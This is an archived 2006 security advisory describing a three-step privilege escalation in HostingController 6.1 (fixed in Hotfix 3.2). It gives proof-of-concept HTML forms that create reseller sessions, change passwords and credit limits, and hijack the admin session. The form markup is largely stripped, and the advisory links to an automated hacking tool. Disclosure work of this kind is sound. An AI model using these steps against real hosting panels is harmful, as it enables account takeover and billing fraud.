TUCoPS :: HP Unsorted H :: b06-3480.htm

Hostingcontroller: an attacker can gain reseller privileges and after that can gain admin privileges
HostingController: An attacker can gain reseller privileges and after that can gain admin privileges
HostingController: An attacker can gain reseller privileges and after that can gain admin privileges


Hi, I'm Soroush Dalili from GrayHatz Security Group (GSG). I publish the most important bugs of hosting controller program, after 3 weeks from reporting to the main company (for more security)

Title: An attacker can gain reseller privileges and after that can gain admin privileges
Version: 6.1 Hotfix <= 3.1
Developer url: www.Hostingcontroller.com
Solution: Update to Hotfix 3.2
Discover date: 2005,Summer
Report date (to hc company): Sat Jun 10, 2006
Publish date (in security forums): Thu July 06, 2006

-------------------------------------------------------------------------------------
===============================================
1- This code give resadmin session to a user:
Bug in "hosting/addreseller.asp", No checker is available.
---------------------------------------------------





Form1

URL: 








reseller





loginname





Password





first_name





first_name





last_name





address





city





state





country





email





phone





fax





zip





selMonth





selYear





txtcardno









---------------------------------------------------
===============================================
2- This code list all of resellers then you must change a password of one of them then login by it for next step.
Note: Also by this code, everyone can increase its Credit value then buy every host.
---------------------------------------------------

action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">




Username:





Description:





FullName:





AccountDisabled 1,[blank]:





UserChangePassword:





PassCheck=TRUE,0:





New Password:





DefaultDiscount%:





CreditLimit:












---------------------------------------------------
===============================================
3- Now you must login by a resseler that changed password from last step. now goto userlist, if there is a user that will enough and if no user available, u must make it!
now select it and click Enter to enter by that user. now the bug will be available:
each reseller can gain every user session even "HCADMIN" by bug in "Check_Password.asp"
below code will help you:
---------------------------------------------------



Form1


action="http://[URL]/Admin/Check_Password.asp" method="post">




AdName












---------------------------------------------------
===============================================

-------------------------------------------------------------------------------------

Finder: Soroush Dalili (http://www.google.com/search?hl=en&q="soroush+dalili")
Email: Irsdl[47]Yahoo[d07]com
Team: GSG (Grayhatz Security Group) [Grayhatz.net]
Thanks from:
        Farhad Saaedi (farhadjokers[4t]yahoo[d0t]com)
        Small.Mouse from Shabgard.org  (small.mouse[4t]yahoo[d0t]com)
Kahkeshan Co. (IT Department) (www.kahkeshan.com)
Related URLs:
http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all hc bugs by Irsdl)
http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password: grayhatz.net] (HC automation hacking program source code by simple VB)

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH